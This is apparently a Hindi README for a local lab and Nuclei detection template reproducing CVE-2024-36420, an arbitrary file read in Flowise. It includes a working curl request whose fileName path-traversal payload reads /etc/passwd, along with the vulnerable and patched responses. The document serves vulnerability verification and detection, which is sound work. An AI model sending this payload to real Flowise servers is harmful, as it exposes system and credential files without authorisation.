
CVE-2024-36420 के लिए स्थानीय पुनरुत्पादन प्रयोगशाला और Nuclei टेम्पलेट, जो Flowise में अस्वच्छित fileName पैरामीटर के माध्यम से एक मनमाना फ़ाइल पढ़ने की कमजोरी है। यह असुरक्षित (1.4.3) और पैच किए गए (3.1.2) व्यवहार की पुष्टि करता है।
CVE-2024-36420 से प्रभावित Flowise के लिए स्थानीय पुनरुत्पादन प्रयोगशाला और nuclei टेम्पलेट ड्राफ्ट।
CVE-2024-36420 Flowise में एक मनमाना फ़ाइल पढ़ने की भेद्यता है, जो fileName बॉडी पैरामीटर के अशोधित उपयोग के कारण होती है:
POST /api/v1/openai-assistants-fileइस प्रयोगशाला का उपयोग निम्नलिखित को मान्य करने के लिए किया गया था:
flowiseai/flowise:1.4.3 पर असुरक्षित व्यवहारflowiseai/flowise:3.1.2 पर अस्वीकृत व्यवहारdocker-compose.ymldocker-compose.latest.ymlCVE-2024-36420.yamlFlowise 1.4.3 प्रारंभ करें:
docker compose down -v
docker compose up -d
docker compose logs --tail=100 flowise
मैन्युअल सत्यापन:
curl -i \
-X POST http://127.0.0.1:3000/api/v1/openai-assistants-file \
-H 'Content-Type: application/json' \
-d '{"fileName":"../../../../etc/passwd"}'
देखी गई असुरक्षित प्रतिक्रिया:
HTTP/1.1 200 OK
Content-Disposition: attachment; filename=passwd
...
root:x:0:0:root:/root:/bin/ash
daemon:x:2:2:daemon:/sbin:/sbin/nologin
...
नया Flowise 3.1.2 प्रारंभ करें:
docker compose -f docker-compose.latest.yml down -v
docker compose -f docker-compose.latest.yml up -d
docker compose -f docker-compose.latest.yml logs --tail=100 flowise
मैन्युअल सत्यापन:
curl -i \
-X POST http://127.0.0.1:3000/api/v1/openai-assistants-file \
-H 'Content-Type: application/json' \
-d '{"fileName":"../../../../etc/passwd"}'
देखी गई नए संस्करण की प्रतिक्रिया:
HTTP/1.1 401 Unauthorized
{"error":"Unauthorized Access"}
टेम्पलेट मान्य करें:
nuclei -duc -validate -t CVE-2024-36420.yaml
असुरक्षित लक्ष्य पर चलाएं:
nuclei -duc -u http://127.0.0.1:3000 -t CVE-2024-36420.yaml
अपेक्षित व्यवहार:
1.4.3: मेल खाता है3.1.2: मेल नहीं खाता1.4.3 पर असुरक्षित3.1.2 पर अस्वीकृत